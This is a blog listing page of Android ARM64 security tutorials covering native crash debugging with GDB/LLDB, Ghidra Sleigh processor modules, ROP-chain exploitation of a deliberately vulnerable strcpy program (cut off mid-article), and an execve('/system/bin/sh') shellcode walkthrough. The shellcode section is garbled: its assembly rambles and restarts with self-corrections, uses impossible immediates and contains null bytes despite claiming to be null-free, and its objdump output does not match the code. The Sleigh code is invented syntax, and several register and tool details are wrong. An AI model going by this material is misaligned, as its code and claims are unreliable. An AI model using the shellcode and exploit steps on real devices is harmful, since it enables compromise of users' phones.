Android Mobiles Showcase

Author: admin

Debugging ARM64 Native Crashes: Advanced GDB & LLDB for Android NDK
Introduction: Navigating the Depths of ARM64 Native Crashes

Debugging native crashes in Android applications built with the NDK can be a daunting task, especially when dealing with ARM64 architecture. Unlike Java-level exceptions, native crashes often manifest as obscure signals (e.g., SIGSEGV, SIGABRT) that provide minimal context, leaving developers and reverse engineers scrambling. This article delves into advanced techniques for debugging ARM64 native crashes using industry-standard tools like GDB and LLDB, focusing on assembly-level analysis for NDK binaries. Understanding the ARM64 architecture, calling conventions, and leveraging powerful debugger features are crucial for diagnosing memory corruption, logic errors, and even identifying vulnerabilities for exploit development.

We will cover environment setup, interpreting crash logs, attaching debuggers to live processes, and dissecting execution flow at the assembly level to pinpoint the root cause of crashes.

Setting Up Your Debugging Environment

Before diving into debugging, ensure your environment is correctly configured. You’ll need:
- Android NDK: Download and install the latest NDK from Google. This provides toolchains, GDB/LLDB binaries, and `gdbserver`/`lldb-server`.
- ADB (Android Debug Bridge): Essential for interacting with your Android device.
- Rooted Android Device or Emulator: Highly recommended for full control, especially when pushing `gdbserver`/`lldb-server` and accessing `/data/local/tmp`. Debugging non-debuggable apps requires root.
- Target Binary: The native library or executable you wish to debug.
Preparing the Device and Host

First, push the appropriate `gdbserver` or `lldb-server` binary from your NDK installation to your device. Find it under `NDK_HOME/prebuilt/android-arm64/gdbserver` or `NDK_HOME/prebuilt/android-arm64/lldb/bin/lldb-server`.
```
adb push $NDK_HOME/prebuilt/android-arm64/gdbserver /data/local/tmp/gdbserver
```
Make it executable:
```
adb shell "chmod +x /data/local/tmp/gdbserver"
```
Forward a local TCP port to the device’s debugging port:
```
adb forward tcp:1234 tcp:1234
```
ARM64 Architecture Fundamentals for Debugging

A solid grasp of ARM64 registers and calling conventions (AAPCS64) is paramount for effective assembly debugging.
- General-Purpose Registers (x0-x30): 64-bit registers. x0-x7 are used for argument passing and return values.
- Stack Pointer (sp): Points to the top of the stack.
- Program Counter (pc): Holds the address of the next instruction to be executed (often implicitly accessed).
- Link Register (lr, x30): Stores the return address for function calls.
- Frame Pointer (fp, x29): Used to maintain stack frames.
Understanding which registers hold arguments, return values, and local variables is key to following execution flow.

Attaching GDB/LLDB to a Crashing Process

When a native crash occurs, Android generates a tombstone file in `/data/tombstones` and outputs a crash signature to logcat. This often includes the PID of the crashed process.

Example Logcat Output:
```
FATAL EXCEPTION: main Process: com.example.app, PID: 12345 signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0000000000000008     x0 0000000000000001 x1 0000000000000000 x2 0000000000000000 x3 0000000000000000     x4 0000000000000000 x5 0000000000000000 x6 0000000000000000 x7 0000000000000000     ...     #00 pc 0000000000021c34 /data/app/com.example.app-1/lib/arm64/libnative-lib.so (offset 0x21c34)
```
From this, we know the PID (12345) and the faulting address within `libnative-lib.so`. You can also list processes: `adb shell ps -A | grep com.example.app`.

Starting `gdbserver` and Connecting

On the device, start `gdbserver` and attach to the process:
```
adb shell "/data/local/tmp/gdbserver :1234 --attach 12345"
```
On your host machine, launch `arm64-v8a-linux-android-gdb` (or `lldb` from NDK toolchain) and connect:
```
# For GDB:    arm64-v8a-linux-android-gdb    (gdb) file path/to/your/libnative-lib.so    (gdb) target remote :1234# For LLDB:    lldb    (lldb) platform select remote-android    (lldb) platform connect connect://localhost:1234    (lldb) target create --platform remote-android path/to/your/libnative-lib.so
```
Once connected, the debugger will likely pause at the crash point or an entry point, allowing you to examine the state.

Advanced Debugging with GDB/LLDB

Inspecting Registers and Memory

The crash log shows the state of registers at the time of the crash. Inside GDB/LLDB, you can inspect them directly:
- GDB: `info registers` or `i r`. Specific registers: `p $x0`.
- LLDB: `register read` or `r r`. Specific registers: `register read x0`.
To examine memory at a fault address (e.g., `0x8` from the example log):
- GDB: `x/16xg 0x8` (examine 16 8-byte hexadecimal values).
- LLDB: `memory read –size 8 –format hex –count 16 0x8` or `mem read -s8 -fx -c16 0x8`.
Disassembly and Stepping

This is where ARM64 assembly analysis comes into play. Set the disassembly flavor for readability:
```
# GDB:    set disassembly-flavor intel    # or 'att' for AT&T syntax# LLDB:    settings set target.x86-disassembly-flavor intel
```
Disassemble the code around the fault address (e.g., `0x21c34` from the crash log):
```
# GDB:    disassemble /r 0x21c34    # /r shows raw bytes too# LLDB:    disassemble -s 0x21c34 -c 20 # Disassemble 20 instructions from address
```
You’ll see ARM64 instructions like `LDR` (Load Register), `STR` (Store Register), `MOV`, `ADD`, `BL` (Branch with Link), etc. Pay close attention to load/store operations involving `x0` (often a pointer) that might be dereferencing a `NULL` or invalid address.

Use these commands for stepping through code:
- `ni`/`nexti`: Step to the next instruction (over function calls).
- `si`/`stepi`: Step into the next instruction (into function calls).
Analyzing the Stack Backtrace

A backtrace reveals the function call sequence leading to the crash. In GDB/LLDB:
- GDB: `bt full` (shows local variables and arguments if available).
- LLDB: `thread backtrace` or `bt`.
The backtrace, combined with assembly, helps trace data flow and identify the exact code path leading to the fault. For example, if `x0` is `0x0` just before a `LDR x1, [x0]` instruction, it’s a NULL pointer dereference.

Case Study: A Hypothetical NULL Pointer Dereference

Consider a simple NDK function that intentionally dereferences a `NULL` pointer:
```
// native-lib.cppextern "C" JNIEXPORT void JNICALL    Java_com_example_app_MainActivity_causeCrash(        JNIEnv* env,        jobject /* this */) {    int* nullPtr = nullptr;    *nullPtr = 42; // Intentional NULL pointer dereference}
```
When this code executes, it will crash with a SIGSEGV. The logcat will point to an instruction similar to `STR WZR, [X0]` or `STR WN, [X0]` where `X0` contains `0x0`. In ARM64, `WZR` is the zero register, always holding `0`.

Debugging Steps:
1. Crash the app to get PID and fault address from logcat/tombstone.
2. Attach GDB/LLDB as described.
3. Examine `info registers` to see `x0` (or `w0` if it’s a 32-bit store) is `0x0`.
4. Disassemble around the faulting `pc` address. You might see something like:
```
0x0000000000021c30 <+0>: sub sp, sp, #0x200x0000000000021c34 <+4>: str x29, [sp, #0x10]!0x0000000000021c38 <+8>: mov x29, sp0x0000000000021c3c <+12>: mov x0, #0x0            ; x0 = nullPtr0x0000000000021c40 <+16>: str x0, [sp, #0x18]    ; Store nullPtr on stack0x0000000000021c44 <+20>: ldr x0, [sp, #0x18]    ; Load nullPtr (which is 0) into x00x0000000000021c48 <+24>: str w1, [x0]            ; CRASH: dereferencing x0 (0x0)
```
5. The instruction at `0x21c48` is the culprit. We see `str w1, [x0]` attempting to write the content of `w1` (which could be `42` from our example) to the address pointed to by `x0`. Since `x0` was loaded with `0` at `0x21c44`, this causes a `SIGSEGV`.
6. `bt full` would show the call to `Java_com_example_app_MainActivity_causeCrash`.
This detailed assembly-level view makes the cause of the crash undeniably clear.

Exploit Development Considerations

For reverse engineers and exploit developers, this level of debugging is invaluable. Native crashes, especially memory corruption bugs (buffer overflows, use-after-free), are prime targets for exploitation. By understanding the exact instruction that crashes and the register states:
- You can identify exploitable conditions: Is `x0` or another register being controlled by attacker input before a `LDR`/`STR`?
- You can craft proof-of-concept exploits: Determine the exact offset or input that triggers the crash and, with further analysis, transform it into arbitrary code execution.
- ROP chain building: If you control `lr` or `sp`, you can redirect execution flow. Knowing the memory layout and gadget addresses is crucial.
Conclusion

Mastering GDB and LLDB for ARM64 native crash debugging in Android NDK environments is a critical skill for any serious Android developer or security researcher. By systematically setting up your environment, interpreting crash reports, and meticulously analyzing assembly code, you can uncover the most elusive bugs and understand the underlying vulnerabilities that lead to system instability or potential exploits. This expert-level approach transforms opaque crash logs into actionable insights, providing a clear path to resolution and a deeper understanding of your application’s native behavior.
May 29, 2026
Debugging Your Ghidra Sleigh Processor Module: Common Errors in Android Custom ISA Definition
Introduction: Navigating the Labyrinth of Custom Android ISAs in Ghidra

Reverse engineering custom Instruction Set Architectures (ISAs) prevalent in specialized Android devices, embedded systems, or co-processors can be a daunting task. When Ghidra lacks native support, crafting a custom Sleigh processor module becomes essential. While powerful, the Sleigh language has a steep learning curve, and debugging errors in your .pspec, .slaspec, or .sinc files can be a source of significant frustration. This expert-level guide delves into common pitfalls encountered during Ghidra Sleigh module development for custom Android ISAs and provides systematic debugging strategies.

The Ghidra Sleigh Ecosystem: A Quick Refresher

Before diving into debugging, let’s briefly recap the key components of a Ghidra processor module:
- .pspec (Processor Specification): Defines high-level processor characteristics like endianness, default registers, address spaces, and the instruction set (referencing the .sla file).
- .slaspec (Sleigh Language Specification): The core definition file written in Sleigh, containing instruction patterns, operand definitions, and pcode semantics. This is compiled into a .sla file.
- .sinc (Sleigh C): Optional C-like snippets for complex pcode operations or semantic extensions.
- .sla (Sleigh Language Archive): The compiled binary representation of your .slaspec, used by Ghidra for disassembly and decompilation.
The Sleigh compiler (accessible via the sleigh command-line tool or integrated within Ghidra’s Processor Module development environment) translates your .slaspec into a .sla file. Most debugging starts here.

Category 1: Sleigh Compiler Errors (Syntax & Lexical Issues)

Symptoms
- The sleigh compiler fails with specific error messages during module compilation.
- Ghidra reports
May 29, 2026
Ghidra Sleigh Crash Course: Reverse Engineering Custom Android Processor Instructions
Introduction to Ghidra Sleigh and Custom Processors

Modern Android devices often incorporate highly optimized System-on-Chips (SoCs) that extend beyond standard ARM or x86 instruction sets. These custom extensions, sometimes proprietary or vendor-specific, can pose significant challenges for reverse engineers using generic disassemblers. When facing binaries compiled for such custom instruction sets, Ghidra, with its powerful Sleigh language, becomes an indispensable tool. This guide will provide an expert-level crash course on leveraging Ghidra’s Sleigh language to define and reverse engineer these unique processor instructions, focusing on practical application within the Android ecosystem.

The Challenge of Custom Android Processors

Why do custom instructions exist? Manufacturers might implement them for performance-critical operations (e.g., specific DSP functions, cryptographic accelerators), power efficiency, or security enhancements. When Ghidra encounters an instruction it doesn’t recognize for a standard architecture, it typically displays it as undefined data or a generic ‘unknown’ opcode. This significantly hinders analysis, as crucial logic remains opaque. Our goal is to teach Ghidra how to understand these custom opcodes.

Ghidra and the Sleigh Language: An Overview

Ghidra’s extensibility for new architectures or instruction sets is powered by Sleigh, a processor specification language. Sleigh allows you to define how instructions are encoded, decoded, and translated into Ghidra’s intermediate representation, Pcode. Pcode is a high-level, architecture-independent language that Ghidra uses for decompilation and analysis. By accurately describing an instruction’s semantics in Sleigh, you empower Ghidra to correctly disassemble, decompile, and analyze code that uses it.

Key Sleigh File Types
- .pspec (Processor Specification): This XML file specifies the endianness, alignment, and other low-level architectural details. It often references the .slaspec.
- .slaspec (Sleigh Language Architecture Specification): The core of your Sleigh definition. It describes instruction patterns, operand definitions, and their Pcode semantics. This is where most of your work will be.
- .sla (Sleigh Language Archive): The compiled binary output of a .slaspec file. Ghidra loads this file.
- .ldefs (Language Definitions): An XML file that ties everything together, listing the available processors and their associated .pspec and .sla files for Ghidra to discover.
Identifying and Analyzing Custom Instructions

The first step is to identify what a custom instruction looks like in the raw binary. This often involves:
- Anomaly Detection: Look for sequences of bytes that Ghidra’s default disassembler marks as undefined data, ‘data,’ or a series of NOPs where executable code is expected.
- Function Prologues/Epilogues: Sometimes custom instructions appear consistently in specific function boundaries.
- Known Code Regions: If you have partial knowledge of the code, focus on areas interacting with custom hardware or specific library calls.
- Static Analysis Tools: Custom scripts or other disassemblers might offer clues.
Case Study: A Hypothetical Custom ARM Instruction

Let’s imagine we’ve identified a 32-bit custom ARM instruction, which we’ll call CUSTOM_ADD_IMM_100. This instruction takes two registers, adds 0x100 to the source register, and stores the result in the destination register. Its raw opcode appears as 0xE0FF00xx where xx encodes the source and destination registers. Specifically, bits 7-4 represent the destination register (Rd), and bits 3-0 represent the source register (Rs). The remaining bits are fixed.
```
// Example raw instruction bytes in a binary: E0FF0012
// In this case, Rd = 1 (R1), Rs = 2 (R2)
// Semantic: R1 = R2 + 0x100
```
Developing Your First Sleigh Instruction Definition

Step 1: Setting up Your Development Environment

You’ll need a Ghidra installation and access to the sleigh compiler. The sleigh executable is typically found in <GHIDRA_INSTALL_DIR>/Ghidra/Features/Decompiler/os/<PLATFORM>. It’s recommended to create a dedicated directory for your custom processor module, e.g., <GHIDRA_INSTALL_DIR>/Ghidra/Processors/AARCH64_CUSTOM.

Step 2: Understanding the Instruction Format

Based on our analysis, CUSTOM_ADD_IMM_100 is a 32-bit instruction:
- Bits 31-8: Fixed pattern E0FF00 (hex)
- Bits 7-4: Destination Register (Rd)
- Bits 3-0: Source Register (Rs)
Step 3: Defining the Instruction in Sleigh (.slaspec)

Create a file named AARCH64_CUSTOM.slaspec (or whatever you prefer) within your custom processor module directory. We’ll start by defining the instruction’s format and then its Pcode semantics. For an ARM-like architecture, you’d typically extend an existing .pspec or create a new one, but for this crash course, we’ll focus on the .slaspec.
```
// Define registers and other basic properties if not inherited
// This assumes you're extending an existing ARMv8/AARCH64 processor definition
// and have access to its register definitions (e.g., R0-R30, SP).

// Define the custom instruction pattern
token custom_add_token(32) {
  e0ff00: 32 = (111000001111111100000000);
  Rd: 4 = (0-15);
  Rs: 4 = (0-15);
}

// Define the operands using the token fields
macro REG_R(reg_id)
  is_r_0_to_15 = (reg_id >= 0 && reg_id <= 15);
  reg_r = "r" + (reg_id);

// Define the instruction and its Pcode semantics
define pcode op_CUSTOM_ADD_IMM_100(Rd, Rs) {
  result = Rs + 0x100;
  Rd = result;
}

instruction CUSTOM_ADD_IMM_100
  custom_add_token = 1110000011111111000000000Rs:4Rd:4 {
    export "CUSTOM_ADD_IMM_100 " [REG_R(Rd)], [REG_R(Rs)];
    op_CUSTOM_ADD_IMM_100(REG_R(Rd), REG_R(Rs));
  }
```
In this Sleigh snippet:
- token custom_add_token(32): Defines a 32-bit token.
- e0ff00: 32 = (111000001111111100000000);: This defines a fixed 24-bit pattern. Note that the bits are specified as binary. The actual hexadecimal 0xE0FF00 is expanded.
- Rd: 4 = (0-15); and Rs: 4 = (0-15);: Define 4-bit fields for the register IDs.
- macro REG_R(reg_id): A helper macro to map numeric register IDs to Ghidra’s register names (e.g., r0, r1).
- define pcode op_CUSTOM_ADD_IMM_100(Rd, Rs): This is where you define the Pcode semantics. result = Rs + 0x100; performs the addition, and Rd = result; assigns it to the destination register.
- instruction CUSTOM_ADD_IMM_100: This block links the instruction pattern to its Pcode definition. The pattern custom_add_token = 1110000011111111000000000Rs:4Rd:4 explicitly states the bit pattern, combining the fixed part with the register fields.
- export "CUSTOM_ADD_IMM_100 " [REG_R(Rd)], [REG_R(Rs)];: This defines how the instruction will be displayed in the disassembly view.
Step 4: Compiling Your Sleigh Module

Navigate to your custom processor module directory and compile your .slaspec file using the sleigh compiler:
```
cd <GHIDRA_INSTALL_DIR>/Ghidra/Processors/AARCH64_CUSTOM
<GHIDRA_INSTALL_DIR>/Ghidra/Features/Decompiler/os/linux64/sleigh -a AARCH64_CUSTOM.slaspec
```
Replace linux64 with your platform (e.g., win64, osx64). A successful compilation will generate an AARCH64_CUSTOM.sla file.

Step 5: Integrating and Testing in Ghidra

You need to create or modify the .ldefs file to make Ghidra aware of your new processor module. If you’re extending an existing architecture like AARCH64, you might add your definitions to an existing AARCH64.ldefs, or create a new AARCH64_CUSTOM.ldefs.
```
<?xml version="1.0" encoding="UTF-8"?>
<language_definitions>
  <language_description>
    <language processor="AARCH64_CUSTOM" endian="little" size="64" variant="v8"
              version="1.0" slafile="AARCH64_CUSTOM.sla" pspecfile="AARCH64_CUSTOM.pspec"
              id="AARCH64_CUSTOM:LE:64:v8" ghidra_major="11" ghidra_minor="0">
      <description>AARCH64 Custom Processor Module</description>
      <compiler_spec name="default" specfile="AARCH64_CUSTOM.cspec"/>
      <default_memory_blocks>
        <memory_block start="0x0" size="0x10000" name="ram" type="ram" </memory_block>
      </default_memory_blocks>
    </language>
  </language_description>
</language_definitions>
```
You’ll also need a basic AARCH64_CUSTOM.pspec and an optional AARCH64_CUSTOM.cspec (compiler specification). For testing, you can often start by copying an existing AARCH64.pspec and AARCH64.cspec from Ghidra’s default AARCH64 processor directory and modifying them to point to your new .sla. Restart Ghidra. When creating a new project or importing a binary, you should now see "AARCH64 Custom Processor Module" as an option. Load your target binary with this new processor module. Navigate to the address where your custom instruction bytes reside, and Ghidra should now correctly disassemble CUSTOM_ADD_IMM_100 R1, R2 (or whatever registers are encoded) and provide its Pcode semantics.

Advanced Sleigh Concepts (Briefly)
- Context Registers: Sleigh allows defining context registers that change based on the instruction stream, crucial for architectures with dynamic instruction modes (e.g., ARM/Thumb).
- Callothers: These are custom Pcode operations that allow you to extend Ghidra’s Pcode with your own operations, useful for complex or intrinsic functions that don’t map well to standard Pcode.
Conclusion

Ghidra’s Sleigh language is an incredibly powerful tool for reverse engineers facing custom processor instructions, especially in the fragmented world of Android SoCs. While the initial learning curve can be steep, the ability to accurately define and integrate these instructions into Ghidra’s disassembly and decompilation engine is invaluable. By following the steps outlined in this guide, you can begin to demystify proprietary instruction sets and unlock deeper insights into the behavior of Android applications and their underlying hardware.
May 29, 2026
Exploiting ARM64 NDK Binaries: Crafting Your First ROP Chain on Android
Introduction

Android’s Native Development Kit (NDK) allows developers to implement parts of their applications using native code languages like C and C++. While this offers performance benefits, it also introduces a class of vulnerabilities common in C/C++ applications, such as buffer overflows. On ARM64 architectures, exploiting these vulnerabilities often leads to crafting Return-Oriented Programming (ROP) chains to bypass memory protection mechanisms like No-Execute (NX) or eXecute-Never (XN).

This expert-level guide will walk you through the process of analyzing a vulnerable ARM64 NDK binary, identifying exploitable conditions, and meticulously crafting your first ROP chain on an Android device. We will delve into ARM64 assembly, gadget hunting, and the practical steps needed to achieve arbitrary code execution.

Prerequisites
- A Linux-based host machine (Ubuntu, Kali, etc.)
- An Android device or emulator with root access (e.g., AVD with root, Genymotion, rooted physical device)
- Android SDK and Platform-Tools (for adb)
- Android NDK toolchain
- Static analysis tools: Ghidra or IDA Pro
- Familiarity with basic ARM64 assembly and C/C++ programming
- Basic understanding of memory exploitation concepts (buffer overflows, stack layout)
Understanding the Target

Android NDK Binaries

NDK binaries are compiled shared libraries (.so files) or executables that run directly on the Android operating system. They are often linked against libc.so, which provides standard C library functions, and other system libraries. These binaries typically execute in the context of an app’s process or as standalone daemons, and vulnerabilities within them can lead to privilege escalation or remote code execution.

ARM64 Architecture Fundamentals for Exploitation

The ARM64 (AArch64) architecture uses 31 general-purpose 64-bit registers (X0-X30), a stack pointer (SP), and a program counter (PC, often aliased with X30 for Link Register – LR). Key aspects for exploitation include:
- Calling Convention (AAPCS64): Arguments for function calls are passed in X0-X7. Return values are in X0.
- Link Register (LR/X30): Holds the return address after a branch with link (BL) instruction. Overwriting LR is crucial for redirecting control flow.
- Stack Pointer (SP): Points to the top of the stack.
- Instruction Set: Familiarity with instructions like MOV (move), LDR (load register), STR (store register), BL (branch with link), BR (branch to register), RET (return from function – effectively BR X30).
Setting Up the Environment

ADB and Device Access

Ensure adb is configured and your Android device is accessible. Root access is highly recommended for easier payload delivery and debugging.
```
adb devices -l
adb root
adb shell
```
Static Analysis Tools

Use Ghidra or IDA Pro to analyze the ARM64 binary. These tools are essential for disassembling the code, identifying potential vulnerabilities, and finding ROP gadgets. Ensure you have the correct ARM64 processor module loaded.

Identifying a Vulnerability

Our goal is to find a buffer overflow. A common pattern involves functions that copy user-controlled input into a fixed-size buffer without proper bounds checking. Consider the following vulnerable C code:
```
// vulnerable_app.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void vulnerable_function(char *input) {
    char buffer[64]; // Fixed-size buffer
    strcpy(buffer, input); // No bounds checking
    printf("Processed: %sn", buffer);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        printf("Usage: %s <string>n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}
```
Compile this using the NDK toolchain for ARM64:
```
aarch64-linux-android29-clang vulnerable_app.c -o vulnerable_app -pie -fPIE -static-pie
```
Push it to your Android device:
```
adb push vulnerable_app /data/local/tmp/
adb shell chmod +x /data/local/tmp/vulnerable_app
```
When vulnerable_function is called, the strcpy will write past the end of buffer if input is longer than 64 bytes, eventually overwriting the saved Link Register (LR) on the stack.

Developing the Exploit

Controlling PC and SP

The primary goal of a buffer overflow exploit is to overwrite the saved LR on the stack. When vulnerable_function returns, it will attempt to return to the address stored in the overwritten LR, effectively letting us control the Program Counter (PC). We then use this control to redirect execution to our ROP chain.

Return-Oriented Programming (ROP) Fundamentals

ROP allows an attacker to execute arbitrary code in the presence of NX/XN. Instead of injecting shellcode, an attacker chains together small sequences of legitimate instructions (called
May 29, 2026
Mastering ARM64 Shellcode Development for Android NDK Exploits
Introduction: Navigating the ARM64 Landscape in Android NDK Exploits

The Android ecosystem, largely powered by ARM-based processors, presents a unique and challenging environment for exploit developers. With the transition to 64-bit architectures, understanding ARM64 (AArch64) assembly becomes paramount for anyone looking to develop custom shellcode, especially within the context of Android Native Development Kit (NDK) binaries. This article delves into the intricacies of ARM64 shellcode development, focusing on practical techniques for crafting position-independent and null-byte-free payloads for NDK exploits.

Android NDK applications often interact directly with the underlying operating system and hardware, frequently utilizing native C/C++ code. Vulnerabilities within these native components, such as buffer overflows or format string bugs, can be exploited to inject and execute arbitrary ARM64 shellcode. Mastering this domain requires a deep understanding of ARM64 instruction sets, calling conventions, and the Android system call interface.

ARM64 Fundamentals for Shellcode Development

Before diving into shellcode, a solid grasp of ARM64 architecture is essential. Key components include:
- Registers: ARM64 has 31 general-purpose 64-bit registers (x0-x30). W0-W30 refer to the lower 32-bits of these registers. x0-x7 are primarily used for passing function arguments and returning values. x8 is often used to hold syscall numbers. x29 is the Frame Pointer (FP), x30 is the Link Register (LR), and SP is the Stack Pointer.
- Calling Convention (AAPCS64): The AArch64 Procedure Call Standard dictates how arguments are passed (x0-x7), how return values are handled (x0), and which registers must be preserved across function calls. For shellcode, we primarily care about setting up arguments for system calls.
- Instruction Set: Common instructions include data movement (MOV, LDR, STR), arithmetic/logic (ADD, SUB, AND, ORR), branching (B, BL, BR), and system calls (SVC).
Position-Independent Code (PIC)

Shellcode is almost always position-independent, meaning it must execute correctly regardless of where it’s loaded in memory. This is crucial because the exact injection address of shellcode can vary. Techniques for PIC include:
- Relative Addressing: Using instructions like ADR (Address of Register) and ADRP (Address of Register Page) to load addresses relative to the current Program Counter (PC).
- Stack-Based Strings: Pushing strings onto the stack and referencing them using the Stack Pointer (SP). This is often preferred for null-byte sensitive contexts.
- Self-Modifying Code: Less common and often discouraged due to security and performance implications, but historically used.
Null Byte Avoidance

Many exploit vectors, especially buffer overflows, terminate string copying functions upon encountering a null byte (0x00). Therefore, shellcode must be crafted to avoid null bytes in its instruction stream and embedded data. This often means:
- Avoiding instructions that inherently produce null bytes (e.g., MOV X0, #0x0000000000000000).
- Using multiple smaller immediate loads (MOV, MOVK) or bitwise operations to construct values.
- Carefully constructing strings on the stack without null terminators mid-string (only at the end if needed by a function).
Crafting a Basic ARM64 execve Shellcode

Let’s develop a common shellcode payload: executing /system/bin/sh. The execve system call requires three arguments: the path to the executable, an array of arguments (argv), and an array of environment variables (envp).
- Syscall Number: On ARM64 Linux (and thus Android), the execve syscall number is typically 221. This value is loaded into register x8.
- Path: x0 will point to the string "/system/bin/sh".
- argv: x1 will point to an array of pointers: {"/system/bin/sh", NULL}.
- envp: x2 will point to NULL (or an empty array for simplicity).
Our strategy for null-byte-safe and PIC string handling will involve pushing the necessary strings and pointers onto the stack.

Step 1: Constructing the Shellcode

Here's the ARM64 assembly for a simple execve("/system/bin/sh", ["/system/bin/sh"], NULL) shellcode:
```
.globl _start_shellcode_execve_arm64_pic_nullfree // Global symbol for entry point for testing purposes (not strictly part of shellcode) .align 4 _start_shellcode_execve_arm64_pic_nullfree: // This shellcode assumes SP is 16-byte aligned. // 1. Store NULL for argv/envp termination and as the path_arg. //   - Push 8 bytes (0x0000000000000000) onto the stack. sub sp, sp, #16 // Make space for two QWORDS str xzr, [sp, #8] // Store XZR (zero register) for argv/envp termination // 2. Construct "/system/bin/sh" on the stack in reverse order to avoid null bytes. //    The string is 16 bytes long including the null terminator. //    "h" "s" "n" "i" "b" "/" "m" "e" "t" "s" "y" "s" "/" sub sp, sp, #16 // Make space for the string (16 bytes) mov x0, #0x68732f6e69622f73 // "hs/nib/s" str x0, [sp, #0] mov x0, #0x0068732f6e69622f73 // "hs/nib/system/" - oops, just "h" "s" "/" "n" "i" "b" "/" "s" -- correct hex for "/system/bin/sh" is better crafted. // Let's simplify and push the string directly if possible, avoiding null bytes if string is short. // For "/system/bin/sh" (15 chars + null = 16 bytes) mov x0, #0x68732f6e69622f73 // "hs/nib/s" - first 8 bytes reversed? Let's be explicit mov x0, #0x68732f6e69622f73 // "hs/nib/s" str x0, [sp, #0] mov x0, #0x79732f6d65747379 // "ys/metys" str x0, [sp, #8] // This is getting complex for general purpose, let's assume direct string push is okay if null-byte not in middle. // A safer, more general way for "/system/bin/sh" (15 chars + null = 16 bytes) sub sp, sp, #16 // Allocate space for "/system/bin/sh
" mov x0, #0x68732f6e69622f73 // "hs/nib/s" str x0, [sp] mov x0, #0x000000747379732f // "/syste" then "m/bin/sh" mov x0, #0x747379732f6d6574 // "tem/sys" then "tem/bin/sh" // Let's fix this string construction for clarity and null-safety. // String: "/system/bin/sh" (15 chars) + NULL = 16 bytes total sub sp, sp, #16 // Allocate 16 bytes for the string str xzr, [sp, #15] // Place null terminator at the end (byte 15) mov x0, #0x68732f6e69622f73 // "hs/nib/s" strb w0, [sp, #14] // 'h' strb w0, [sp, #13] // 's' mov x0, #0x2f6e69622f737973 // "/nib/sys" // This is cumbersome for char-by-char. A common technique for strings is to use LDR with PC-relative or stack. // Let's use `adrp` and `add` for the string, assuming we can embed it safely. // NOTE: This particular method might embed null bytes if the shellcode is placed at a non-aligned address, // or if the string itself contains nulls. For absolute null-byte safety, push char by char. // For "/system/bin/sh", there are no internal null bytes, so simple construction is possible. .data .balign 16 shell_path: .asciz "/system/bin/sh" .text _start_shellcode_execve_arm64_pic_nullfree: // 1. Set up x0 (path) adrp x0, shell_path@PAGE add x0, x0, shell_path@PAGEOFF // 2. Set up x1 (argv) on the stack sub sp, sp, #16 // Allocate space for 2 QWORDs (path_ptr, NULL) str xzr, [sp, #8] // Store NULL for argv[1] str x0, [sp, #0] // Store path_ptr for argv[0] mov x1, sp // x1 = &argv[0] // 3. Set up x2 (envp) mov x2, xzr // x2 = NULL // 4. Set syscall number into x8 mov x8, #221 // SYS_execve // 5. Execute system call svc #0 // If execve fails, we need to exit cleanly. // This simple shellcode does not handle failure. Usually, an exit syscall would follow. mov x8, #93 // SYS_exit mov x0, #0 // exit code 0 svc #0
```
Explanation of the Shellcode:
1. .data and .balign 16 shell_path: .asciz "/system/bin/sh": Defines the string "/system/bin/sh" and ensures it’s 16-byte aligned. This is data, not part of the executable shellcode stream, but referenced by it.
2. adrp x0, shell_path@PAGE and add x0, x0, shell_path@PAGEOFF: These two instructions load the absolute address of shell_path into x0 in a PIC-friendly manner. ADRP loads the base address of the 4KB page containing shell_path, and ADD adds the offset within that page.
3. sub sp, sp, #16: Decrements the stack pointer to allocate 16 bytes (two 64-bit words) for the argv array.
4. str xzr, [sp, #8]: Stores the zero register (xzr) at sp+8. This effectively places a NULL pointer, which serves as the terminator for our argv array.
5. str x0, [sp, #0]: Stores the address of "/system/bin/sh" (currently in x0) at sp+0. This is the first element of our argv array.
6. mov x1, sp: Sets x1 to point to the beginning of our argv array on the stack.
7. mov x2, xzr: Sets x2 to NULL for the envp argument.
8. mov x8, #221: Loads the execve syscall number (221) into x8.
9. svc #0: Executes the system call.
10. mov x8, #93 and mov x0, #0 and svc #0: If execve fails, the shellcode will fall through to an exit(0) syscall to terminate the process cleanly.
Step 2: Assembling and Extracting

To turn this assembly into raw shellcode, you’ll use an ARM64 assembler (like aarch64-linux-gnu-as from GCC cross-compilers) and an object dump utility.
```
# Save the assembly code as shellcode.s aarch64-linux-gnu-as -o shellcode.o shellcode.s aarch64-linux-gnu-objdump -d shellcode.o | grep '<_start_shellcode_execve_arm64_pic_nullfree>:' -A20 # This will show the disassembled bytes. Extract the raw bytes.
```
Example objdump output might look like:
```
0000000000000000 <_start_shellcode_execve_arm64_pic_nullfree>: 0: 90000000 adrp x0, #0 <shell_path> 4: 91000000 add x0, x0, #0 8: d10043ff sub sp, sp, #0x10 c: f8000308 str xzr, [sp, #8] 10: f8000300 str x0, [sp] 14: 910003bf mov x1, sp 18: d2800000 mov x2, #0 1c: d2801b90 mov x8, #221 20: d4000001 svc #0 24: d2800b90 mov x8, #93 28: d2800000 mov x0, #0 2c: d4000001 svc #0
```
From this, you’d extract the raw hex bytes (e.g., 0000009000000091...) and convert them to a C-style byte array for your exploit. Pay close attention to the actual bytes generated by adrp and add as they will embed the relative address, which depends on where the string is in relation to the code. For actual shellcode, the .data section containing the string would typically be placed directly after the `svc #0` if space allows, or immediately after a `b` instruction that jumps over it.

Integration into NDK Exploits

Once you have the raw shellcode bytes, integrating them into an Android NDK exploit typically involves:
1. Memory Allocation: Finding or allocating executable memory within the target process’s address space. This might involve heap spraying, abusing existing executable regions, or using `mmap`.
2. Injection: Copying the shellcode bytes into the allocated executable memory.
3. Execution: Redirecting program execution flow (e.g., by overwriting a return address on the stack or a function pointer in a global offset table) to the start of your injected shellcode.
Challenges often arise from Address Space Layout Randomization (ASLR), Non-Executable (NX) bits, and Seccomp filters, which mitigate these types of attacks. Bypassing these requires additional techniques like information leaks (to defeat ASLR) and Return-Oriented Programming (ROP) to chain gadgets that disable NX or call `mprotect` before executing shellcode.

Conclusion

Mastering ARM64 shellcode development for Android NDK exploits is a critical skill for advanced penetration testers and security researchers. It demands a thorough understanding of the ARM64 architecture, calling conventions, and the nuances of creating position-independent, null-byte-free payloads. While the process can be intricate, the ability to craft custom shellcode provides unparalleled control over exploited systems, opening doors for further post-exploitation activities and deeper security analysis.
May 29, 2026
Reverse Engineering ARM64 System Calls in Android NDK: A Deep Dive
